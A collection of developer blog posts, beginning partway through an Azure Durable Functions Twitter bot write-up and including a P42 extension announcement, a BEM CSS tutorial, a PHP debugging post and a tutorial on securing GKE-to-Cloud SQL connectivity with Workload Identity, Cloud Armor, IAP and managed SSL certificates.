const requestUrl = `/repos/${context.bindings.configuration.repositoryOwner.toString()}/${context.bindings.configuration.repositoryName.toString()}/releases/latest`
const repositoryInformation = await octokit.request(requestUrl)
```
The Activity Function curates the relevant information for the further processing from the result and returns it to the orchestrator.
### The History Reader Activity Function
In this Activity Function we fetch the historical information from our storage for the repository that we want to check to find out which was the latest version we were aware of.
Although the requirement is the same as for reading the configuration, the filtering needs a bit more input, namely the repository owner and the repository name. Although this data is transferred into the Function via the activity trigger, it is not accessible in the declarative definition of the Table input binding (or at least I did not manage to access it).
Therefore I read the whole history table via the input binding and then filter the corresponding entries in the Activity Function code. As the number of entries is not that large, there shouldn't be a big performance penalty.
The binding itself is therefore quite basic:
```json
{
"name": "updateHistory",
"type": "table",
"connection": "myStorageConnectionString",
"tableName": "RepositoryUpdateHistory",
"partitionKey": "History",
"direction": "in"
}
```
And the filtering of the desired entry looks like this:
```javascript
const result = <JSON><any>context.bindings.updateHistory.find( entry => ( entry.RepositoryOwner === context.bindings.configuration.repositoryOwner && entry.RepositoryName === context.bindings.configuration.repositoryName))
```
With this information the orchestrator can now decide if a tweet needs to be sent and consequently the history table must be updated. The following sections describe the Activity Functions needed to achieve this.
### The Update Twitter Sender Activity Function
If a tweet should be sent out, we need to call the Twitter API. In contrast to the GitHub Activity, we need to be registered as a developer in the Twitter developer portal and also register an app in that portal to be able to do so. This is well described in the official documentation (see [developer.twitter.com](https://developer.twitter.com/)).
With this in place we "just" need to make an authenticated call to the Twitter API, right? This is where the fun starts ...
There is no official tool, library or SDK for that (see [Twitter developer platform - Tools and Libraries](https://developer.twitter.com/en/docs/twitter-api/tools-and-libraries)). There are some community contributions but most of them are outdated and/or reference outdated npm packages including some with security vulnerabilities.
I finally ended up with [twitter-lite](https://www.npmjs.com/package/twitter-lite) that has TypeScript support and takes over the burden of authentication.
However, for TypeScript-based implementations you must take care with the import, as discussed in this [GitHub issue](https://github.com/draftbit/twitter-lite/issues/111).
Using the following import works:
```javascript
const TwitterClient = require('twitter-lite')
```
The final code then looks like this:
```javascript
const tweetText = buildTweet(context)
try {
const client = new TwitterClient({
consumer_key: process.env["TwitterApiKey"],
consumer_secret: process.env["TwitterApiSecretKey"],
access_token_key: process.env["TwitterAccessToken"],
access_token_secret: process.env["TwitterAccessTokenSecret"]
})
const tweet = await client.post("statuses/update", {
status: tweetText
})
context.log.info(`Tweet successfully sent: ${tweetText}`)
} catch (error) {
context.log.error(`The call of the Twitter API caused an error: ${error}`)
}
```
The text of the tweet is built via a combination of free text, the release news from GitHub, and the data from the configuration table where I keep my hashtags.
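The assembly happens in the `buildTweet` helper seen in the snippet above. In the repository that helper receives the Function context; the standalone signature and field names below are simplifications for illustration, not the bot's actual code:

```javascript
// Simplified sketch of assembling the tweet text from the GitHub release
// information and the hashtags stored in the configuration table.
// Property names are illustrative.
const buildTweet = (release, configuration) =>
  `New release ${release.tagName} of ${configuration.repositoryName} is available! ` +
  `${release.htmlUrl} ${configuration.hashtags}`
```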
Here is one example of a tweet issued by the bot:

### The History Update Activity Function
The last step of the orchestration is the update of the entry in the history table to remember the latest version that we tweeted about.
As we want to either insert a new value into the table (if we tweeted for the first time) or update an existing entry, we cannot use the Table Output binding as this one only allows inserts (and be assured I tried to update via that binding 😉).
So I update the table entries via code, which is okay (do not be too "religious" about bindings). I used the [Microsoft Azure Storage SDK for Node.js and JavaScript](https://github.com/Azure/azure-storage-node). This SDK is quite cumbersome to use, as it relies on callback functions. I wrapped them using the pattern described in this [blog post](https://blog.maximerouiller.com/post/wrapping-nodejs-azure-table-storage-api-to-enable-async-await/) by [Maxime Rouiller](https://dev.to/maximrouiller).
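Following that pattern, the wrapper essentially turns the callback-based call into a Promise. A minimal sketch of such a wrapper (the actual repository code may differ in details):

```javascript
// Wrap the callback-based insertOrMergeEntity of the azure-storage
// table service into a Promise so it can be awaited.
const insertOrMergeEntity = (tableService, tableName, entity) =>
  new Promise((resolve, reject) => {
    tableService.insertOrMergeEntity(tableName, entity, (error, result) => {
      if (error) {
        reject(error)
      } else {
        resolve(result)
      }
    })
  })
```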
With that the code looks like this:
```javascript
const tableSvc = AzureTables.createTableService(process.env["myStorageConnectionString"])
const entGen = AzureTables.TableUtilities.entityGenerator
let tableEntry = {
PartitionKey: entGen.String(process.env["HistoryPartitionKeyValue"]),
RowKey: entGen.String(context.bindings.updateInformation.RowKey),
RepositoryOwner: entGen.String(context.bindings.updateInformation.RepositoryOwner),
RepositoryName: entGen.String(context.bindings.updateInformation.RepositoryName),
Name: entGen.String(context.bindings.updateInformation.Name),
TagName: entGen.String(context.bindings.updateInformation.TagName),
PublishedAt: entGen.DateTime(context.bindings.updateInformation.PublishedAt),
HtmlURL: entGen.String(context.bindings.updateInformation.HtmlUrl),
UpdatedAt: entGen.DateTime(new Date().toISOString())
}
const result = await insertOrMergeEntity(tableSvc, process.env["HistoryEntityName"], tableEntry)
```
In the meantime a new library arrived ([Link](https://github.com/Azure/azure-sdk-for-js/tree/main/sdk/tables/data-tables)) that supports state-of-the-art JavaScript and TypeScript. To be honest, I was too lazy to switch, as the API changed a bit, or maybe I just wanted to keep some work for later improvement ... who knows 😇
With that we are through the implementation of the single Functions. Let us take a look at the surroundings of the development in the next sections.
## Some Points about Local Development
As I mentioned before, I did the complete development locally, and here are some points I think are worth mentioning:
- The storage emulator _Azurite_ works like a charm. So no need to rely on the outdated Azure Storage emulator. You can and should switch to Azurite.
- I wanted to switch off the timer trigger Function during development as I relied on the HTTP triggered Function to start the orchestration. To achieve this you need one setting in the `local.settings.json` file, namely `"AzureWebJobs.[NameOfTheFunction].Disabled": true`. The Function runtime will still do some sanity checks on the Function despite that setting, which made me aware of an error in the Function. That's cool imho.
- As I used Azurite for the local development I had the corresponding setting of `"AzureWebJobsStorage": "UseDevelopmentStorage=true"` in my `local.settings.json` file. I decided to use a different storage for my configuration and history table, which means you must specify the connection string to that storage in the Functions that make use of the non-default storage ... which you might forget when you do the local development. For the sake of science I made that error (or I just forgot the setting ... who knows) and be assured you will become aware of that when you deploy the Function. So specify that connection in your bindings in case you deviate from the default storage attached to your Function, like in my case:
```json
"connection": "myStorageConnectionString"
```
## Deployment via GitHub Actions
In order to deploy my Functions to Azure I made use of _GitHub Actions_. I must state: I was stunned how smooth the deployment went through.
I followed the official documentation ([Link](https://docs.microsoft.com/azure/azure-functions/functions-how-to-github-actions?tabs=javascript)) and used the pre-defined [template](https://github.com/Azure/actions-workflow-samples/blob/master/FunctionApp/windows-node.js-functionapp-on-azure.yml) and it worked out of the box.
The only adaptation I made was to exclude files from triggering the action, e.g. the markdown files, via:
```yaml
on:
push:
branches:
- main
paths-ignore:
- "**.md"
```
With the improvements that GitHub is pushing towards Actions (like environments etc.) I think that this is the path to follow in the future.
### Setup in Azure
I did the setup of the main resources in Azure manually (no Terraform, no Bicep .. and yes shame on me for that - having said that I will definitely take a look at Bicep and try to replicate the setup with it).
Nevertheless, some remarks on my setup and what I have seen/learned:
- I stored my Twitter app keys in Azure Key Vault and referenced the secrets in my Function App settings/configuration. The reference follows the pattern `@Microsoft.KeyVault(SecretUri=[URI copied from the Key Vault Secret])`.
One cool thing here is: you might make a copy & paste error but Azure has you covered there as it will validate the reference and put a checkmark if everything is fine (valid URI and valid access rights):

- Use the Azure Storage Explorer to analyze your Durable Function executions. You can use it locally or with your resources in Azure. It really helps a lot when you need to dig into that.
- Do logging in your Functions. And if you think you have enough, think again. This can really help you with narrowing down errors, especially in a setup with nested orchestrations.
- Separate configuration and code i.e. use environment variables/App setting to increase the flexibility of your setup and avoid magic numbers and magic strings as far as possible.
- Use _Azure Application Insights_. The effort for the basic setup is minimal and it is a huge help when you need to analyze errors, performance issues etc.
- Create _budget alerts_. Although we are at the lower end of costs, maybe some errors occur that make your Functions run crazy, and then this comes to your rescue. I also have an unexpectedly high usage of the storage that I might need to investigate.
At the time of writing this blog post, the Twitter bot has been running for only a week, so everything looks fine so far. This also means no deeper insights with respect to productive usage in this project, so it would be a bit artificial to make statements about best practices there.
If you want to read a bit more about it from the experience that is more settled I would recommend the blog post [My learnings from running the Azure Functions Updates Twitterbot for half a year](https://blog.marcduiker.nl/2019/09/05/my-learnings-from-running-the-azure-functions-updates-twitterbot-for-half-a-year.html) by [Marc Duiker](https://www.polywork.com/marcduiker).
## Conclusion and Outlook
So here we are now. We have a Twitter Bot up and running making use of Azure Durable Functions (including sub-orchestrators) in TypeScript. I experienced a huge improvement in this area over the last years although the _primus inter pares_ with respect to the Azure Functions runtimes is still .NET in my opinion.
The experience of setting up the Functions and deploying them was smooth and I especially like the possibility to do the development completely locally. This also got improved with Azurite now.
There were no real frustrating bumpers along the way besides the usual "finding the right npm package".
So wrapping up: I hope you find some useful hints and learnings in this post and give Durable Functions a try also in more complex business process like scenarios.
| lechnerc77 |
736,519 | P42 for Visual Studio Code | 💡 This blog post is about P42 JavaScript Assistant v0.0.3 P42 for Visual Studio Code is now... | 13,408 | 2021-06-23T09:09:49 | https://p42.ai/blog/2021-06-23/p42-for-visual-studio-code | vscode, javascript, typescript |
> 💡 This blog post is about P42 JavaScript Assistant v0.0.3
[P42 for Visual Studio Code](https://marketplace.visualstudio.com/items?itemName=p42ai.refactor) is now available in the Visual Studio Marketplace.
The **free extension includes all refactorings and code modernizations** that are available in P42. It can be used on all repositories and runs entirely locally.
When you open a JavaScript or TypeScript file, P42 will automatically detect code that could be modernized and highlight it:

You can then effortlessly update your code using the Quick Fix function.
With P42 for Visual Studio Code, you can learn new JavaScript patterns right in your IDE, make sure new code follows best practices, and modernize older code gradually.
**[Try out P42 for Visual Studio Code today!](https://marketplace.visualstudio.com/items?itemName=p42ai.refactor)**
| lgrammel |
736,549 | cute owl using css and html | A post by Saba Alikhani | 0 | 2021-06-23T09:45:25 | https://dev.to/fydsa/cute-owl-using-css-and-html-1jge | codepen, css, html | {% codepen https://codepen.io/fydsa/pen/qBrzqor %} | fydsa |
736,565 | BEM For Beginners | Naming things in programming is not easy,not only in programming but also in css.Some programmers... | 0 | 2021-06-23T10:08:55 | https://dev.to/cglikpo/css-bem-made-easy-40i3 | css, codenewbie, methodologies, bem |
Naming things in programming is not easy, and CSS is no exception. Some programmers don't give naming much thought; they say that there isn't enough time to choose the name each class should have. That may be true, but low-quality code takes significantly longer to develop in the long term. There are several ways of resolving the naming issue, one of which is known as Block-Element-Modifier (BEM). We'll take a deeper look at what BEM is and how to use it to arrange your CSS code in this post.
## What is BEM?
BEM stands for Block, Element, and Modifier. It’s a CSS naming convention for writing cleaner and more readable CSS classes.
BEM also aims to write independent CSS blocks in order to reuse them later in your project.
```
/* Blocks are named as standard CSS classes */
.block {
}
/* Elements are declared with 2 underscores, after the block */
.block__element {
}
/* Modifiers are declared with 2 dashes, after the block or after an element */
.block--modifier {
}
/* Element and modifier together */
.block__element--modifier {
}
```
### What is a Block?
Blocks are independent, reusable and usually bigger components of a webpage. They can have modifiers and contain elements.
We can count bigger parts of a webpage like `header`, `nav`, `section`, `form`, `article`, `aside`, and `footer` as block examples.
For example, LinkedIn’s Header Navigation can be used as a block, and can be declared as:
```
<header class="global-nav"></header>
<style>
.global-nav {
// Rules
}
</style>
```
### Elements
Elements are children of blocks. An element can only have 1 parent Block, and can’t be used independently outside of that block. Examples of LinkedIn header elements are the LinkedIn logo, the search field, and so on.
An element's name must begin with the name of its parent Block, followed by two underscores, and then the element's own name.
```
<header class="global-nav">
<div class="global-nav__content">
<div class="global-nav__top-left-part">
<a href="#" class="global-nav__branding">
<img class="global-nav__logo" />
</a>
<div class="search-global">
<input class="search-global__input" />
<div class="search-global__icon-container">
<img class="search-global__icon" />
</div>
</div>
</div>
<nav class="global-nav__top-right-part">
<ul class="global-nav__items">
<li class="global-nav__item">
<a href="#" class="global-nav__primary-link">
<img class="global-nav__icon"/>
<span class="global-nav__primary-link-text">Home</span>
</a>
</li>
</ul>
</nav>
</div>
</header>
```
### Modifiers
Different states or styles of classes are represented by modifiers. They may be used for blocks as well as elements.
In HTML, a modifier must be used in conjunction with its Block / Element to provide additional functionality:
```
<button class="button button--success">
Success button
</button>
<button class="button button--danger">
Danger button
</button>
```
The naming of a modifier must start with its parent Block name, 2 dashes after it, and end with its own name.
#### Block — Modifier:
```
.btn {
  /* rules */
}
.btn--primary {} /* Block modifiers */
.btn--secondary {}
```
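The same scheme applies when a modifier sits on an element rather than on the block itself. A small illustrative example (the class names are hypothetical):

```
.btn__icon {} /* Element */
.btn__icon--large {} /* Element modifier */
```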
Let's see it in action:
{% youtube ZQpPydztf7g %}
### Conclusion
BEM is a new way of authoring CSS that is cleaner and easier to maintain. However, there are some arguments against BEM, claiming that it is ineffective.
Whether you use BEM or not is up to you, your team, and maybe the project. What are your thoughts? Do you prefer to use BEM?
If you like my work, please consider
[](https://www.buymeacoffee.com/cglikpo)
so that I can bring more projects, more articles for you
If you want to learn more about Web Development, feel free to [follow me on Youtube!](https://www.youtube.com/c/ChristopherGlikpo)
| cglikpo |
736,607 | How to Debug Php code | Writing code is hard enough, and having to debug any problems that occur in your code just makes it... | 0 | 2021-06-23T11:22:25 | https://dev.to/cglikpo/how-to-debug-php-code-21gd | php, codenewbie, tutorial, programming |
Writing code is hard enough, and having to debug any problems that occur in your code just makes it even harder. Debugging is also much less enjoyable than writing code. Debugging is as old as programming itself. As software engineers, you will always be faced with bugs. To debug well, you need to know how to debug your code.
That is why in this video I will show you some tips, tricks, and tactics on how you can debug code to make your debugging process quicker, easier, and more enjoyable. This will give you more time to focus on the fun part of coding. I will show you how to debug errors in PHP Scripts.
{% youtube iaynJkeLWlc %}
If you want to learn more about Web Development, feel free to [follow me on Youtube!](https://www.youtube.com/c/ChristopherGlikpo)
| cglikpo |
736,639 | Securing the connectivity between a GKE application and a Cloud SQL database | In the previous part we created our Cloud SQL instance. In this part, we'll put them all together and... | 13,254 | 2021-06-24T12:51:42 | https://dev.to/stack-labs/securing-the-connectivity-between-a-gke-application-and-a-cloud-sql-database-4d6b | googlecloud, kubernetes, terraform, mysql |
In the [previous part][part-4] we created our Cloud SQL instance. In this part, we'll put them all together, deploy Wordpress to Kubernetes, and connect it to the Cloud SQL database. Our objectives are to:
* Create the IAM Service Account to connect to the Cloud SQL instance. It will be associated to the Wordpress Kubernetes service account.
* Create 2 deployments: One for Wordpress and one for the [Cloud SQL Proxy][gcp-6].
* Create the Cloud Armor security policy to restrict load balancer traffic to only authorized networks.
* Configure the OAuth consent screen and credentials to enable Identity Aware Proxy.
* Create SSL certificates and enable the HTTPs redirection.

# IAM Service Account
[Workload Identity][gcp-1] is the recommended way to access Google Cloud services from applications running within GKE.
> With Workload Identity, you can configure a Kubernetes service account to act as a Google service account. Pods running as the Kubernetes service account will automatically authenticate as the Google service account when accessing Google Cloud APIs.
Let's create this Google service account. Create the file `infra/plan/service-account.tf`.
```terraform
resource "google_service_account" "web" {
account_id = "cloud-sql-access"
display_name = "Service account used to access cloud sql instance"
}
resource "google_project_iam_binding" "cloudsql_client" {
role = "roles/cloudsql.client"
members = [
"serviceAccount:cloud-sql-access@${data.google_project.project.project_id}.iam.gserviceaccount.com",
]
}
data "google_project" "project" {
}
```
And the associated Kubernetes service account in `infra/k8s/data/service-account.yaml`:
```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
annotations:
iam.gke.io/gcp-service-account: cloud-sql-access@<PROJECT_ID>.iam.gserviceaccount.com
name: cloud-sql-access
```
Let's run our updated terraform:
```shell
cd infra/plan
terraform apply
```
And create the Kubernetes service account:
```shell
$ gcloud container clusters get-credentials private --region $REGION --project $PROJECT_ID
$ kubectl create namespace wordpress
$ sed -i "s/<PROJECT_ID>/$PROJECT_ID/g;" infra/k8s/data/service-account.yaml
$ kubectl create -f infra/k8s/data/service-account.yaml -n wordpress
```
The Kubernetes service account will be used by the Cloud SQL Proxy deployment to access the Cloud SQL instance.
Allow the Kubernetes service account to impersonate the created Google service account by an IAM policy binding between the two:
```shell
gcloud iam service-accounts add-iam-policy-binding \
--role roles/iam.workloadIdentityUser \
--member "serviceAccount:$PROJECT_ID.svc.id.goog[wordpress/cloud-sql-access]" \
cloud-sql-access@$PROJECT_ID.iam.gserviceaccount.com
```
# Cloud SQL Proxy
We use the Cloud SQL Auth proxy to secure access to our Cloud SQL instance without the need for Authorized networks or for configuring SSL.
Let's begin by the deployment resource:
`infra/k8s/data/deployment.yaml`
```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: cloud-sql-proxy
name: cloud-sql-proxy
spec:
selector:
matchLabels:
app: cloud-sql-proxy
strategy: {}
replicas: 3
template:
metadata:
labels:
app: cloud-sql-proxy
spec:
serviceAccountName: cloud-sql-access
containers:
- name: cloud-sql-proxy
image: gcr.io/cloudsql-docker/gce-proxy:1.23.0
ports:
- containerPort: 3306
protocol: TCP
envFrom:
- configMapRef:
name: cloud-sql-instance
command:
- "/cloud_sql_proxy"
- "-ip_address_types=PRIVATE"
- "-instances=$(CLOUD_SQL_PROJECT_ID):$(CLOUD_SQL_INSTANCE_REGION):$(CLOUD_SQL_INSTANCE_NAME)=tcp:0.0.0.0:3306"
securityContext:
runAsNonRoot: true
resources:
requests:
memory: 2Gi
cpu: 1
```
The deployment resource refers to the service account created earlier. Cloud SQL instance details are retrieved from a Kubernetes config map:
`infra/k8s/data/config-map.yaml`
```yaml
apiVersion: v1
kind: ConfigMap
metadata:
name: cloud-sql-instance
data:
CLOUD_SQL_INSTANCE_NAME: <CLOUD_SQL_INSTANCE_NAME>
CLOUD_SQL_INSTANCE_REGION: <CLOUD_SQL_REGION>
CLOUD_SQL_PROJECT_ID: <CLOUD_SQL_PROJECT_ID>
```
We expose the deployment resource using a Kubernetes service:
`infra/k8s/data/service.yaml`
```yaml
apiVersion: v1
kind: Service
metadata:
labels:
app: cloud-sql-proxy
name: cloud-sql-proxy
spec:
ports:
- port: 3306
protocol: TCP
name: cloud-sql-proxy
targetPort: 3306
selector:
app: cloud-sql-proxy
```
Let's create our resources and check if the connection is established:
```shell
cd infra/plan
sed -i "s/<CLOUD_SQL_PROJECT_ID>/$PROJECT_ID/g;s/<CLOUD_SQL_INSTANCE_NAME>/$(terraform output cloud-sql-instance-name | tr -d '"')/g;s/<CLOUD_SQL_REGION>/$REGION/g;" ../k8s/data/config-map.yaml
$ kubectl create -f ../k8s/data -n wordpress
$ kubectl get pods -l app=cloud-sql-proxy -n wordpress
NAME READY STATUS RESTARTS AGE
cloud-sql-proxy-fb9968d49-hqlwb 1/1 Running 0 4s
cloud-sql-proxy-fb9968d49-wj498 1/1 Running 0 5s
cloud-sql-proxy-fb9968d49-z95zw 1/1 Running 0 4s
$ kubectl logs cloud-sql-proxy-fb9968d49-hqlwb -n wordpress
2021/06/23 14:43:21 current FDs rlimit set to 1048576, wanted limit is 8500. Nothing to do here.
2021/06/23 14:43:25 Listening on 0.0.0.0:3306 for <PROJECT_ID>:<REGION>:<CLOUD_SQL_INSTANCE_NAME>
2021/06/23 14:43:25 Ready for new connections
```
Ok! Let's move on to the Wordpress application.
# Wordpress application
Let's begin with the deployment resource:
`infra/k8s/web/deployment.yaml`
```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: wordpress
labels:
app: wordpress
spec:
selector:
matchLabels:
app: wordpress
strategy:
type: Recreate
template:
metadata:
labels:
app: wordpress
spec:
containers:
- image: wordpress
name: wordpress
env:
- name: WORDPRESS_DB_HOST
value: cloud-sql-proxy:3306
- name: WORDPRESS_DB_USER
value: wordpress
- name: WORDPRESS_DB_NAME
value: wordpress
- name: WORDPRESS_DB_PASSWORD
valueFrom:
secretKeyRef:
name: mysql
key: password
ports:
- containerPort: 80
name: wordpress
volumeMounts:
- name: wordpress-persistent-storage
mountPath: /var/www/html
livenessProbe:
initialDelaySeconds: 30
httpGet:
port: 80
path: /wp-admin/install.php # at the very beginning, this is the only accessible page. Don't forget to change to /wp-login.php
readinessProbe:
httpGet:
port: 80
path: /wp-admin/install.php
resources:
requests:
cpu: 1000m
memory: 2Gi
limits:
cpu: 1200m
memory: 2Gi
volumes:
- name: wordpress-persistent-storage
persistentVolumeClaim:
claimName: wordpress
```
`infra/k8s/web/service.yaml`
```yaml
apiVersion: v1
kind: Service
metadata:
name: wordpress
annotations:
cloud.google.com/neg: '{"ingress": true}'
spec:
type: ClusterIP
ports:
- port: 80
targetPort: 80
selector:
app: wordpress
```
> The `cloud.google.com/neg` annotation specifies that port 80 will be associated with a [zonal network endpoint group (NEG)][gcp-7]. See [Container-native load balancing][gcp-8] for information on the benefits, requirements, and limitations of container-native load balancing.
We create a PVC for Wordpress:
`infra/k8s/web/volume-claim.yaml`
```yaml
kind: PersistentVolumeClaim
apiVersion: v1
metadata:
name: wordpress
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 5Gi
```
We finish this section by initializing our Kubernetes ingress resource. This resource will allow us to access the Wordpress application from the internet.
Create the file `infra/k8s/web/ingress.yaml`
```yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
annotations:
kubernetes.io/ingress.global-static-ip-name: "wordpress"
kubernetes.io/ingress.class: "gce"
name: wordpress
spec:
defaultBackend:
service:
name: wordpress
port:
number: 80
rules:
- http:
paths:
- path: /*
pathType: ImplementationSpecific
backend:
service:
name: wordpress
port:
number: 80
```
> The `kubernetes.io/ingress.global-static-ip-name` annotation specifies the name of the global IP address resource to be associated with the HTTP(S) Load Balancer. [2]
Let's create our resources and test the Wordpress application:
```shell
cd infra/k8s
$ kubectl create secret generic mysql \
--from-literal=password=$(gcloud secrets versions access latest --secret=wordpress-admin-user-password --project $PROJECT_ID) -n wordpress
gcloud compute addresses create wordpress --global
$ kubectl create -f web -n wordpress
$ kubectl get pods -l app=wordpress -n wordpress
NAME READY STATUS RESTARTS AGE
wordpress-6d58d85845-2d7x2 1/1 Running 0 10m
$ kubectl get ingress -n wordpress
NAME CLASS HOSTS ADDRESS PORTS AGE
wordpress <none> * 34.117.187.51 80 16m
```

Anyone can access the application. Let's create a Cloud Armor security policy to restrict traffic to only the authorized network.
# Cloud Armor security policy
We use [Cloud Armor security policy][gcp-2] to filter incoming traffic that is destined to external HTTP(S) load balancers.
Create the `infra/plan/cloud-armor.tf`:
```terraform
resource "google_compute_security_policy" "wordpress" {
name = "wordpress"
rule {
action = "allow"
priority = "1000"
match {
versioned_expr = "SRC_IPS_V1"
config {
src_ip_ranges = var.authorized_source_ranges
}
}
description = "Allow access to authorized source ranges"
}
rule {
action = "deny(403)"
priority = "2147483647"
match {
versioned_expr = "SRC_IPS_V1"
config {
src_ip_ranges = ["*"]
}
}
description = "default rule"
}
}
```
Let's run our updated terraform:
```shell
cd infra/plan
terraform apply
```

Now, let's create a backend config in Kubernetes and reference the security policy.
> BackendConfig custom resource definition (CRD) allows us to further customize the load balancer. This CRD allows us to define additional load balancer features hierarchically, in a more structured way than annotations. [3]
`infra/k8s/web/backend.yaml`
```yaml
apiVersion: cloud.google.com/v1
kind: BackendConfig
metadata:
name: wordpress
spec:
securityPolicy:
name: wordpress
```
```shell
kubectl create -f infra/k8s/web/backend.yaml -n wordpress
```
Add the annotation `cloud.google.com/backend-config: '{"default": "wordpress"}'` in the wordpress service:
```shell
kubectl apply -f infra/k8s/web/service.yaml -n wordpress
```
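For reference, after adding the annotation the metadata section of the wordpress service should look roughly like this (a sketch; the rest of the resource is unchanged):

```yaml
metadata:
  name: wordpress
  annotations:
    cloud.google.com/neg: '{"ingress": true}'
    cloud.google.com/backend-config: '{"default": "wordpress"}'
```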
Let's check if the HTTP Load balancer has attached the security policy:


It looks nice. Let's do a test.
Put a wrong IP to check that requests are rejected:
```shell
gcloud compute security-policies rules update 1000 \
--security-policy wordpress \
--src-ip-ranges "85.56.40.96"
curl http://34.117.187.51/
<!doctype html><meta charset="utf-8"><meta name=viewport content="width=device-width, initial-scale=1"><title>403</title>403 Forbidden
```
Now let's put a correct IP:
```shell
gcloud compute security-policies rules update 1000 \
--security-policy wordpress \
--src-ip-ranges $(curl -s http://checkip.amazonaws.com/)
curl http://34.117.187.51/
<!doctype html>
<html lang="en-GB" >
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>admin – Just another WordPress site</title>
```
Ok!
With this backend configuration, only employees in the same office can access the application. Now we also want them to be authenticated to access the application. We can achieve this by using [Identity Aware Proxy (Cloud IAP)][gcp-3].
# Enabling Cloud IAP
We use IAP to establish a central authorization layer for our Wordpress application accessed by HTTPS.
> IAP is integrated through Ingress for GKE. This integration enables you to control resource-level access for employees instead of using a VPN. [1]
Follow the instructions described in the GCP documentation to:
* [Configure the OAuth consent screen][gcp-4]
* [Create the OAuth credentials][gcp-5]
* [Setting up IAP access][gcp-9]
Create a Kubernetes secret to wrap the OAuth client you created earlier:
```shell
CLIENT_ID_KEY=<CLIENT_ID_KEY>
CLIENT_SECRET_KEY=<CLIENT_SECRET_KEY>
kubectl create secret generic wordpress --from-literal=client_id=$CLIENT_ID_KEY \
--from-literal=client_secret=$CLIENT_SECRET_KEY \
-n wordpress
```
Let's update our Backend configuration
```yaml
apiVersion: cloud.google.com/v1
kind: BackendConfig
metadata:
name: wordpress
spec:
iap:
enabled: true
oauthclientCredentials:
secretName: wordpress
securityPolicy:
name: wordpress
```
Apply the changes:
```shell
kubectl apply -f infra/k8s/web/backend.yaml -n wordpress
```

Let's do a test

Ok!
# SSL Certificates
If you have a domain name, you can enable Google-managed SSL certificates using the CRD [ManagedCertificate][gcp-10].
> Google-managed SSL certificates are Domain Validation (DV) certificates that Google Cloud obtains and manages for your domains. They support multiple hostnames in each certificate, and Google renews the certificates automatically. [4]
Create the file `infra/k8s/web/ssl.yaml`
```yaml
apiVersion: networking.gke.io/v1
kind: ManagedCertificate
metadata:
name: wordpress
spec:
domains:
- <DOMAIN_NAME>
```
We can create the domain name using Terraform or simply with the gcloud command:
```shell
export PUBLIC_DNS_NAME=
export PUBLIC_DNS_ZONE_NAME=
gcloud dns record-sets transaction start --zone=$PUBLIC_DNS_ZONE_NAME
gcloud dns record-sets transaction add $(gcloud compute addresses list --filter=name=wordpress --format="value(ADDRESS)") --name=wordpress.$PUBLIC_DNS_NAME. --ttl=300 --type=A --zone=$PUBLIC_DNS_ZONE_NAME
gcloud dns record-sets transaction execute --zone=$PUBLIC_DNS_ZONE_NAME
sed -i "s/<DOMAIN_NAME>/wordpress.$PUBLIC_DNS_NAME/g;" infra/k8s/web/ssl.yaml
kubectl create -f infra/k8s/web/ssl.yaml -n wordpress
```
Add the annotation `networking.gke.io/managed-certificates: "wordpress"` in your ingress resource.

Let's do a test

Ok!
To redirect all HTTP traffic to HTTPS, we need to create a [FrontendConfig][gcp-11].
Create the file `infra/k8s/web/frontend-config.yaml`
```yaml
apiVersion: networking.gke.io/v1beta1
kind: FrontendConfig
metadata:
name: wordpress
spec:
redirectToHttps:
enabled: true
responseCodeName: MOVED_PERMANENTLY_DEFAULT
```
```shell
kubectl create -f infra/k8s/web/frontend-config.yaml -n wordpress
```
Add the annotation `networking.gke.io/v1beta1.FrontendConfig: "wordpress"` in your ingress resource.
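Putting it together, the ingress metadata with all the annotations used in this series would look roughly like this (a sketch; only the metadata section is shown):

```yaml
metadata:
  name: wordpress
  annotations:
    kubernetes.io/ingress.global-static-ip-name: "wordpress"
    kubernetes.io/ingress.class: "gce"
    networking.gke.io/managed-certificates: "wordpress"
    networking.gke.io/v1beta1.FrontendConfig: "wordpress"
```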

Let's do a test
```shell
curl -s http://wordpress.<HIDDEN>.stack-labs.com/
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>301 Moved</TITLE></HEAD><BODY>
<H1>301 Moved</H1>
The document has moved
<A HREF="https://wordpress.<HIDDEN>.stack-labs.com/">here</A>.
</BODY></HTML>
```
Ok then!
# Conclusion
Congratulations! You have completed this long workshop. In this series we have:
* Created an isolated network to host our Cloud SQL instance
* Configured a Google Kubernetes Engine Autopilot cluster with fine-grained access control to the Cloud SQL instance
* Tested the connectivity between a Kubernetes container and a Cloud SQL instance database.
* Secured access to the Wordpress application
That's it!
# Clean
Remove the NEG resources. You will find them in `Compute Engine > Network Endpoint Group`.
Run the following commands:
```shell
terraform destroy
gcloud dns record-sets transaction remove $(gcloud compute addresses list --filter=name=wordpress --format="value(ADDRESS)") --name=wordpress.$PUBLIC_DNS_NAME. --ttl=300 --type=A --zone=$PUBLIC_DNS_ZONE_NAME
gcloud dns record-sets transaction execute --zone=$PUBLIC_DNS_ZONE_NAME
gcloud compute addresses delete wordpress
gcloud secrets delete wordpress-admin-user-password
```
# Final Words
[The source code is available on Gitlab][demo-repo].
If you have any questions or feedback, please feel free to leave a comment.
Otherwise, I hope I have helped you answer some of the hard questions about connecting GKE Autopilot to Cloud SQL and providing a pod-level, defense-in-depth security strategy at both the networking and authentication layers.
By the way, do not hesitate to share with peers 😊
Thanks for reading!
# Documentation
[1] https://cloud.google.com/iap/docs/enabling-kubernetes-howto
[2] https://cloud.google.com/kubernetes-engine/docs/tutorials/configuring-domain-name-static-ip
[3] https://cloud.google.com/kubernetes-engine/docs/how-to/ingress-features#configuring_ingress_features
[4] https://cloud.google.com/load-balancing/docs/ssl-certificates/google-managed-certs
[part-4]: https://dev.to/stack-labs/securing-sensitive-data-in-cloud-sql-23hg
[gcp-1]: https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity
[gcp-2]: https://cloud.google.com/armor/docs/configure-security-policies
[gcp-3]: https://cloud.google.com/iap/docs/concepts-overview
[gcp-4]: https://cloud.google.com/iap/docs/enabling-kubernetes-howto#oauth-configure
[gcp-5]: https://cloud.google.com/iap/docs/enabling-kubernetes-howto#oauth-credentials
[gcp-6]: https://cloud.google.com/sql/docs/mysql/sql-proxy
[gcp-7]: https://cloud.google.com/load-balancing/docs/negs
